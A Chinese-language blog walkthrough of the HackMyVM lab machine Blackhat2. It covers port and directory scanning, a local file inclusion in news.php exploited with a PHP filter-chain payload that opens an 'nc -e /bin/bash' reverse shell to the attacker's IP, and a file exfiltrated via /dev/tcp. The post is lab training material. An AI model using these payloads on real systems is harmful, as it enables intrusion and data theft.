{"id":674,"date":"2024-05-07T18:25:44","date_gmt":"2024-05-07T10:25:44","guid":{"rendered":"http:\/\/162.14.82.114\/?p=674"},"modified":"2024-05-07T18:25:44","modified_gmt":"2024-05-07T10:25:44","slug":"hmv-_-blackhat2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/674\/05\/07\/2024\/","title":{"rendered":"hmv[-_-]Blackhat2"},"content":{"rendered":"

Blackhat2<\/h1>\n
\n

\u975e\u5e38\u4e0d\u9519\u7684\u4e00\u4e2a\u9776\u673a\u0295\u2022\u032b\u0361\u2022 \u0294\u2022\u032b\u0361\u2022\u0f7b\u0295\u2022\u032b\u0361\u2022\u0294\u2022\u0353\u0361\u2022\u0294<\/p>\n<\/blockquote>\n

\"image-20240502153936517\"<\/div><\/p>\n

\"image-20240502154127744\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/blackhat2]\n\u2514\u2500$ rustscan -a 192.168.0.125 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.125:22\nOpen 192.168.0.125:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 04:2a:cb:c4:54:0e:de:54:a1:f2:61:d7:6a:29:f6:5f (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBUIyR90zqbTcOv6QWBqWJd9VdbWlQGf7cvk2FHPkzLIcHPHFn07VAZ3uxnFKlIDFytteuJ2qtVlhmK5TMnBxxg=\n|   256 a8:02:05:f3:a6:61:7d:e8:8b:e5:6f:1c:5b:7b:5b:33 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMN5dOXWLsMESN+NWjIo49NYaAJl8lCuoiTtA8zxqdSF\n80\/tcp open  http    syn-ack Apache httpd 2.4.57 ((Debian))\n|_http-title: Home - Hacked By sML\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-server-header: Apache\/2.4.57 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/blackhat2]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.125\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.125\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,jpg,txt,html,php,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/news.php             (Status: 200) [Size: 3418]\n\/.php                 (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 996]\n\/index.php            (Status: 200) [Size: 996]\n\/dp.jpg               (Status: 200) [Size: 238753]\n\/2021                 (Status: 200) [Size: 31875]\n\/2022                 (Status: 200) [Size: 34213]\n\/2023                 (Status: 200) [Size: 36067]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240502154246470\"<\/div><\/p>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
\"image-20240502154347503\"<\/div><\/p>\n
http:\/\/192.168.0.125\/dp.jpg<\/code><\/pre>\n
\"image-20240502154408225\"<\/div>
\n
\"image-20240502154451142\"<\/div><\/p>\n
\u8fd8\u6709\u5f88\u591a\uff0c\u4f46\u662f\u6682\u65f6\u6ca1\u5565\u7528\uff1a<\/p>\n
fuzz<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/blackhat2]\n\u2514\u2500$ ffuf -w \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-medium-directories-lowercase.txt -u 'http:\/\/192.168.0.125\/news.php?FUZZ=..\/..\/..\/..\/..\/..\/'  -fw 1401\n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.0.125\/news.php?FUZZ=..\/..\/..\/..\/..\/..\/\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-medium-directories-lowercase.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 1401\n________________________________________________\n\nemail                   [Status: 200, Size: 3927, Words: 1571, Lines: 150, Duration: 2ms]\n:: Progress: [26584\/26584] :: Job [1\/1] :: 2564 req\/sec :: Duration: [0:00:08] :: Errors: 2 ::<\/code><\/pre>\n
\"image-20240502154721001\"<\/div>
\n
\"image-20240502154731137\"<\/div><\/p>\n
\u5c1d\u8bd5\u4e00\u4e0bLFI\u6f0f\u6d1e\uff1a<\/p>\n
\"image-20240502154754175\"<\/div><\/p>\n
\u8fdb\u4e00\u6b65\u5c1d\u8bd5\uff1a<\/p>\n
\"image-20240502154839362\"<\/div><\/p>\n
php filter\u94fe<\/h3>\n
http:\/\/192.168.0.125\/news.php?year=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=nc -e \/bin\/bash 192.168.0.143 1234<\/code><\/pre>\n
\"image-20240502155012835\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@blackhat2.hmv:\/var\/www\/html$ ls -la\ntotal 852\ndrwxr-xr-x 2 root root   4096 Feb 26 10:19 .\ndrwxr-xr-x 4 root root   4096 Feb 26 10:19 ..\n-rw-r--r-- 1 root root  31875 Feb 26 10:19 2021\n-rw-r--r-- 1 root root  34213 Feb 26 10:19 2022\n-rw-r--r-- 1 root root  36067 Feb 26 10:19 2023\n-rw-r--r-- 1 root root 238753 Feb 26 10:19 dp.jpg\n-rw-r--r-- 1 root root   4658 Feb 26 10:19 full-stack-apache-setup.xml\n-rw-r--r-- 1 root root 485364 Feb 26 10:19 hacker.webp\n-rw-r--r-- 1 root root    996 Feb 26 10:19 index.html\n-rw-r--r-- 1 root root    996 Feb 26 10:19 index.php\n-rw-r--r-- 1 root root   4560 Feb 26 10:19 news.php\n-rw-r--r-- 1 root root   2332 Feb 26 10:19 style.css\n(remote) www-data@blackhat2.hmv:\/var\/www\/html$ head hacker.webp \nRIFF\ufffdgWEBPVP8 \n_\ufffd+\n   \ufffd*>1\ufffdB\ufffd!! \ufffd\/\ufffd\ufffdfwa?\ufffd\ufffdy\ufffdA\ufffd\ufffd\ufffd,\ufffd7\ufffd\ufffd\ufffd%\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd]\ufffd\ufffd\ufffd\n                                              \ufffd\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffd\ufffd\ufffd\ufffdT\ufffda\ufffd\ufffd\u0107\ufffdm\ufffd\ufffd\ufffd\\~_\ufffd\ufffd\ufffd#\ufffd\ufffd3\ufffd+\u06f3\ufffd}@?\ufffd\ufffdc\ufffd`>\ufffd\ufffd`~\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd_\ufffd\/\ufffd_\ufffd\ufffd\ufffd|~\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdE\ufffd\ufffd~Zu\ufffd\ufffd>\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd|\ufffdq\ufffd^|\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdv\ufffd\ufffdo\ufffd~\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd(}\ufffd\ufffd\n\ufffd\ufffd\ufffdo\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdW\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdh~\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd+\ufffd\ufffd\ufffd?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd?\ufffd\ufffd\ufffd~Xr\ufffd_\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdu\ufffd\ufffd\ufffdM\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd?     \ufffd\ufffd?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n                                                                                                 \ufffd\ufffd\ufffdc\ufffd\ufffd\ufffd\ufffd\u0337\ufffd\ufffd\ufffd\ufffd\ufffd?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd?\ufffd?\ufffd?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdw\ufffdG\ufffd\ufffd\u070f\ufffd_\ufffd\ufffd\ufffd\ufffd5\ufffd\ufffd\ufffd\ufffd\ufffd\u073fgU\ufffd3\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd?\ufffd~\ufffd\ufffd\ufffd\ufffd]\ufffd;\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdl\ufffd\ufffd\ufffd\ufffd\ufffd?\ufffd?l\ufffdv\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd_\ufffd\ufffd\ufffds\ufffd?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd_\ufffd\ufffd\ufffd\ufffd\ufffdk\ufffdK\ufffd\ufffd\ufffd\ufffd?\ufffdo\ufffd_\ufffd\ufffd\ufffd?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd?\ufffd?\ufffd~\ufffd|\ufffd[\ufffd\/\ufffd\ufffd\ufffd'\ufffd?\u06ef\ufffd\/\ufffd?\ufffd\ufffd\ufffds\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdy\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd_\ufffd?\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd\ufffd\ufffdg\ufffd\/\ufffd\ufffd\ufffd\ufffd?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdO\ufffd\ufffd0\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdIK\ufffdl@\u025e\n                                                                        C\ufffd3\ufffd\ufffd\u0568Y<M\ufffdc\ufffdW\ufffd\ufffd\ufffdyl\\O\ufffd\ufffd\ufffdt~\ufffd\ufffd\n                                                                                                   \ufffd\ufffd\ufffd\ufffd|%\ufffd\ufffdT\u03e4j\ufffd\ufffd\ufffde\ufffd\ufffd\ufffd\u0601J\ufffd`\n                                                                                                                        \ufffdk\ufffd\ufffd\ufffd56QW\ufffdp\ufffd\u014aY\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffds\n                                                                                                                                               \u0700\ufffd*\u066b\ufffd>;\ufffd\ufffd\ufffd\ufffd&\ufffdZ\ufffdM\ufffdVv\ufffd\ufffd0\ufffd:Z\ufffd\ufffdP\ufffd\n                         \ufffd\u0471\ufffd\ufffdf]\ufffd\ufffd?\ueb5a\ufffd-\ufffd\ufffd#P\ufffdfs)\ufffdG\u02cf\ufffdm1$\ufffd\u050d \ufffd\ufffd\ufffd\ufffd,F\ufffd<BX\ufffd8\ufffd    \ufffd\ufffd\ufffd=l\ufffd\ufffd\ufffd\ufffd&\ufffd\ufffd\ufffd<\ufffdO\ufffds\ufffdT\\\ufffd!\ufffdi3I\ufffdnOt}\ufffd\ufffd\ufffdI\ufffd\ufffd\ufffd\ufffd"r\ufffdf\ufffd\ufffd\ufffd\u01e2\ufffdo~\ufffd\ufffd\ufffd$\ufffdv\ufffdt\ufffdl}\ufffdU?\ufffd|\ufffdT3\ufffd\ufffdr\ufffd\ufffdR\ufffdq\ufffd'\ufffdw\ufffd\nF.~\ufffd(\ufffd\ufffdzE\ufffd5\ufffde=vf-D5T\ufffd\ufffd;E\ufffdb:\ufffdZ\ufffd_KwQ\ufffd\ufffd\ufffde\ufffd\ufffdN%?\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdk_^\ufffd\ufffd1y\ufffd\ufffd\ufffd     \ufffd\ufffd\ufffd\ufffdz?4\ufffd\ufffd^\ufffd\u0544\ufffd\ufffd\ufffd?b|\ufffd\ufffd\u04d4E\ufffd\n\ufffd\ufffdg\u05fdr\ufffd`%Q\ufffdz\ufffd\ufffd;\u07c1\ufffd\ufffd\ufffd^\ufffdPJ\ufffd\ufffdv3\ufffd\ufffdE\u07dc:\u0525\ufffd\ufffd\ufffdyA\n                                     8]\ufffd\ufffdvGo4\ufffd:\ufffd\ufffdt\ufffd\ufffd\ufffd\ufffd^\ufffd\ufffd(\ufffdY \ufffd\ufffd\ufffd\ufffd\ufffdV\ufffd\ufffdx\ufffd&w\ufffd2\ufffdr\ufffd\ufffds1^|[]\ufffd\ufffd\ufffdD\n                                                                                         Z\ufffd\ufffd\ufffd\u04a9H\ufffd~\ufffd\ufffdS\u9042\ufffd\nG|\ufffdLGmE\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u077a\ufffd\ufffdg?\ufffd\n                   \ufffd<Rc\ufffd\ufffd\ufffd+lk6\ufffdiEX\ufffd\ufffdK\ufffd>\ufffd\ufffd\ufffdy\u0470\ufffd\ufffdiL\ufffd|\ufffd";\ufffd\ufffdN\ufffd\ufffd\ufffdr\ufffd\ufffd\ufffd 1Z>5\n\ufffd\ufffd\ufffd\ufffdf\ufffdI\ufffd"o{:t\ufffd}^\ufffd\ufffd2_\ufffd\ufffd\ufffd\ufffd\ufffdkx\ufffd\u017e{\ufffd\ufffd\u06d1\ufffd\ufffd]\ufffd+6j\ufffd                           \ufffd\ufffd{r\n\ufffd*\ufffd\u0169}\u0122\ufffd\/\ufffd\ufffdC>\ufffd\ufffdZK\ufffds;$\u04c3\ufffd\ufffd)z\ufffd`Nv\ufffd6\ufffd\ufffdbP\n                                 r\ufffdU|w\ufffd|#z\ufffd\ufffd1\ufffdH\n\ufffd%\ufffd\ufffd \ufffd:S\ufffd\u02ef\ufffd42\ufffdR\u053a\ufffd\u07d1\uf464\ufffd\ufffd~u\ufffd\ufffd,\ufffd\ufffd:\ufffd\u03f5l\ufffd\ufffd\ufffd\ufffd*6R\ufffd>\ufffd\ufffd\ufffd$\ufffdF\ufffd?\u05fa\ufffd\ufffd\ufffd 3\ufffdt^\u0642\ufffd\ufffdE\ufffdO\ufffddQm[\ufffd\ufffd8X\ufffd\ufffd-\ufffd\ufffd`kZq\ufffd4\ufffd\ufffddJ\ufffd\ufffd\ufffdj$r\ufffd\ufffdt\ufffdw\ufffd\ufffd*\ufffd\ufffd.\ufffd{\ufffdy\n                 \ufffd\ufffd\ufffd&\ufffd\ufffd\ufffd;\nTi\ufffd<\ufffd\ufffd\ufffdR\ufffdD\ufffd\ufffd?Nr8GzG\ufffd\ufffd6\ufffd\ufffd\ufffd3\ufffdZ\ufffdZHM,H\ufffd\ufffd\ufffd\ufffd*]\ufffd~4\ufffdx\ufffdHS\ufffd\ufffd\u067b\ufffd&`\u07be\u0315\ufffd\ufffd\u02bfbs\ufffd\ufffd\ufffd\ufffd\ufffdZc\n\ufffd\ufffd`o\ufffd\u02fc\ufffd\ufffd<V\ufffdL\ufffd\ufffda\ufffd:]\ufffd\u00d5M\ufffdp\n\ufffd\ufffd\ufffd\u0675\ufffd\ufffdo\ufffd\u01f3\ufffdG\ufffdw\ufffd\ufffd\ufffd\ufffdusP\ufffdp\ufffdu\ufffdmq\ufffd_\ufffd\ufffd\ufffdICWr&\ufffd\ufffd9:\ufffd\ufffd+\ufffd\n\ufffd\ufffdD\ufffd\ufffd\u07e3\ufffd\ufffd;Sa\ufffd#AR\ufffd(q,\ufffdd\ufffd#\ufffdso*C\ufffdB\ufffd&\ufffdiH\ufffd\ufffd\ufffd\u00afiK\ufffdw+\ufffd\u0580\ufffdm\u0778\ufffd\ufffd>\u04fb\ufffd4L}z\ufffd\ufffd\u070b\ufffd\ufffdb        \ufffd1      I\ufffd\ufffd\ufffd\ufffd\ufffdF\ufffd\ufffd'pi X_\ufffd\ufffd\ufffd\ufffd\ufffdU\ufffdX\ufffdE\ufffd\u078e\ufffdIw'\ufffd\ufffdb#,\ufffd\ufffd$\ufffdi\ufffd\ufffd\ufffd\n                                                             \\\ufffd\ufffd\ufffd\ufffd\/\ufffd\ufffd\ufffdr\ufffd\ufffd\\G\ufffdk\ufffd\ufffd\ufffd\ufffd\ufffdF\ufffd\ufffd\ufffd\ufffd\ufffdO\ufffd8\ufffd\ufffdE\ufffd\ufffd\ufffd\ufffdDr\ufffd\ufffd&\ufffd^*K~y\ufffd\ufffd`\ufffd`\ufffdk\ufffd\ufffdf\ufffd8\ufffd7\ufffdY\ufffd\ufffd\ufffdF\/\ufffd\ufffd\ufffd\ufffd^\n\ufffdsG\ufffdLh1"\ufffdkd\ufffd\ufffd\ufffd\ufffd\u0269~c@\ufffd\ufffd\ufffdW\ufffd\ufffd\ufffdg\ufffd\ufffd,\ufffdt\ufffd\ufffdj\\\ufffdA\ufffd\ufffd\ufffdX\ufffdL\u0464\ufffd\u06c4wDF\ufffd\ufffd\ufffd\ufffdK\ufffd=\ufffd\ufffd\\\ufffd\ufffd\ufffdw=\ufffdH\ufffd\ufffdY\ufffd\ufffdW2V-\ufffd)\ufffd\n           \ufffd\ufffd\ufffd  \ufffd\ufffd\ufffd\u0594\ufffd\ufffd\ufffd\ufffd\ufffdSg\ufffd5*\ufffd:uY\n                                 \ufffd\u062b\ufffd\ufffd\ufffd\ufffd<y\ufffd\ufffd1<xt\ufffd!-y\ufffd,"\ufffda8\ufffd\u04bd\ufffd:xf\ufffd\u02b8\ufffdcX\ufffd\ufffdU\ufffdf\ufffd\ufffdEJi\ufffd>=\ufffd\ufffd>\ufffd\ufffd\ufffdP\ufffdP\ufffd]\ufffd\ufffdU\ufffd\ufffd\ufffd.\ufffdc\ufffd$m0\ufffd\ufffd9g\ufffdKd\ufffd~\ufffd\ufffdQ\ufffd!\ufffd&\ufffd\ufffd\ufffd\ufffd\/\ufffda.\ufffd\ufffd\ufffdU\ufffdS\u069c\n                                                                                                                                        \ufffdH\n                                                                                                                                         \ufffd\ufffd\ufffdj\ufffd9\ufffd<=M\/\u04d8&7E\ufffd#4\ufffd\ufffd      \ufffdE\ufffdM\ufa7f5j\ufffd\ufffd\u078c\ufffddWT\ufffd\ufffdWnK\ufffdA\u40c7\u00d4q\ufffd\ufffdb\ufffd\ufffdB_\ufffd\ufffd@\ufffd)\u0474TJ3\ufffdV0\ufffd"\ueba6\ufffd\\q\ufffdL\ufffd\ufffd\ufffd?\ufffd\ufffd2M0N8\ufffd\ufffd]\ufffd0\ufffd\ufffdk\ufffd&\ufffd\ufffd\ufffd\ufffdBy?\\1\ufffd\ufffd~\ufffd.\ufffdL&\ufffd\u04b9\ufffdq\ufffdFh\ufffdvw\ufffd\ufffd a\ufffdjfx\ufffd\ufffd\ufffd\ufffd\ufffdi\ufffd\ufffd\ufffdd$\ufffd\ufffdt\ufffdh\ufffd\ufffd\n\ufffd8\ufffd+\ufffd\ufffdW\ufffd^\ufffd![\ufffd\u0796\ufffd\ufffd\ufffdj\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdEP\ufffd\ufffd\ufffdw\ufffd\ufffdz>\u04f5z\ufffdF@&\ufffd\u0772 ;P\ufffd`('\ufffd\ufffd\ufffd,\ufffd\\\ufffd\ufffdhD\ufffd\ufffdrX\ufffd\ufffd\ufffd\ufffdI\ufffd"\ufffd $5\ufffd\ufffd\u0512\ufffdl\ufffd\ufffd\ufffd \ufffd~\ufffd\ufffdPlm\ufffd\ufffd_\ufffd\ufffd\ufffd\ufffd\ufffdwW:\ufffd    cp\n     \ufffd\ufffd'\ufffdH\ufffdR\ufffd}\ufffd\ufffd:-\ufffd\ufffd\ufffd\ufffdwD\ufffdo\ufffd\ufffde\ufffd\ufffd\ufffdN:\ufffd\ufffdD\ufffd\ufffd\ufffdm\ufffd>_8\ufffd\ufffdZ%3\ufffdVj\ufffd\ufffdj\ufffd9\ufffdi\ufffd\ufffd}\ufffdv\ufffd\ufffd\ufffd\/X$4\ufffd\ufffd\ufffd\ufffd^\ufffd3F\ufffd\ufffd\n\ufffdz\ufffd4j\ufffd\ufffd~\/\ufffd\ufffd\ufffd_z\ufffd\u0137\u015dX\ufffd\ufffd\u07a2\ufffd\ufffd\ufffd\u847fH\ufffdL\ufffd\ufffd\ufffd\ufffdqn3\ufffd"N\ufffd\n(remote) www-data@blackhat2.hmv:\/var\/www\/html$ sudo -l\nbash: sudo: command not found\n(remote) www-data@blackhat2.hmv:\/var\/www\/html$ cat \/etc\/passwd | grep "bash"\nroot:x:0:0:root:\/root:\/bin\/bash\nsml:x:1000:1000:,,,:\/home\/sml:\/bin\/bash\n(remote) www-data@blackhat2.hmv:\/var\/www\/html$ cd \/home\n(remote) www-data@blackhat2.hmv:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Feb 26 10:25 .\ndrwxr-xr-x 18 root root 4096 Feb 26 09:58 ..\ndrwx------  3 sml  sml  4096 Feb 26 10:32 sml\n(remote) www-data@blackhat2.hmv:\/var\/www$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n(remote) www-data@blackhat2.hmv:\/var\/www$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=e<\/code><\/pre>\n
\u5c1d\u8bd5\u4f20\u4e00\u4e2a\u654f\u611f\u6587\u4ef6\u8fc7\u6765\uff1a<\/p>\n
(remote) www-data@blackhat2.hmv:\/var\/www\/html$ ls -la\ntotal 852\ndrwxr-xr-x 2 root root   4096 Feb 26 10:19 .\ndrwxr-xr-x 4 root root   4096 Feb 26 10:19 ..\n-rw-r--r-- 1 root root  31875 Feb 26 10:19 2021\n-rw-r--r-- 1 root root  34213 Feb 26 10:19 2022\n-rw-r--r-- 1 root root  36067 Feb 26 10:19 2023\n-rw-r--r-- 1 root root 238753 Feb 26 10:19 dp.jpg\n-rw-r--r-- 1 root root   4658 Feb 26 10:19 full-stack-apache-setup.xml\n-rw-r--r-- 1 root root 485364 Feb 26 10:19 hacker.webp\n-rw-r--r-- 1 root root    996 Feb 26 10:19 index.html\n-rw-r--r-- 1 root root    996 Feb 26 10:19 index.php\n-rw-r--r-- 1 root root   4560 Feb 26 10:19 news.php\n-rw-r--r-- 1 root root   2332 Feb 26 10:19 style.css\n(remote) www-data@blackhat2.hmv:\/var\/www\/html$ cat hacker.webp > \/dev\/tcp\/192.168.0.143\/4444<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/blackhat2]\n\u2514\u2500$ nc -lvnp 4444 > hacker.webp\nlistening on [any] 4444 ...\nconnect to [192.168.0.143] from (UNKNOWN) [192.168.0.125] 59234<\/code><\/pre>\n
\u672c\u5730\u770b\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240502155643498\"<\/div><\/p>\n
